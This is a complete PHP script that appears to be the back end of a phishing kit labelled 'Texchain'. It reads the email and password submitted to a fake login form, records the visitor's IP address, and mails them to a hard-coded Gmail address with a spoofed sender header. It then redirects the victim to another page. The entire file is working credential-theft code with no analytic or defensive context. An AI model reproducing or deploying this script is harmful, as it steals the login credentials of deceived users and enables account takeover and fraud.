<?php
    $to = "bisolaregina4@gmail.com";
    $ip = getenv("REMOTE_ADDR");
    $user = $_POST['Email'];
    $pass = $_POST['password'];
    $subject = $ip ."Texchain Details"; 
    $message = "Email: $user\n Pass: $pass\nip: $ip\n";
if (empty($user) || empty($pass)) {
header( "Location: index.html" );
}
else {
$headers .= "MIME-Version: 1.0\n";
    $headers = "From: Texchain <new@abitantbuilders.co.uk>\n";
	mail($to, $subject, $message, $headers);
	header("Location: server.html");
	}
    
    	
?>